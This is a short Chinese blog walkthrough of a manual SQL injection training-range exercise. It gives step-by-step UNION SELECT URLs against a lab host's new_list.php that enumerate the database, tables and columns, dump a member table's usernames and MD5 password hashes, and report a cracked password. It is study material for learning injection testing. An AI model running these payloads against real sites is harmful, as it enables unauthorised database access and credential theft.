SQL手工注入方法

 SQL手工注入漏洞测试(MySQL数据库) 的靶场练习   流程与方法

注意:加粗部分给重点

查询数据库名
http://219.153.49.228:46939/new_list.php?id=22 union select 1,database(),3,4 from information_schema.tables
获取到的库名

mozhe_Discuz_StormGroup
查询库下的表名

http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
获取到的表名

StormGroup_member,notice
查询表下的字段

http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
获取到的字段名

id,name,password,status
查询数据

http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(id,0x5c,name,0x5c,password,0x5c,status),3,4 from StormGroup_member
​得到的数据(ox5c为 的16进制)

1mozhe356f589a7df439f6f744ff19bb8092c0,1mozhe4adef249540a3cb5d79c85f6ccc7ddb91

MD5解密得到密码,经过测试有可用

4adef249540a3cb5d79c85f6ccc7ddb9

946377

原文地址:https://www.cnblogs.com/createwell/p/14127833.html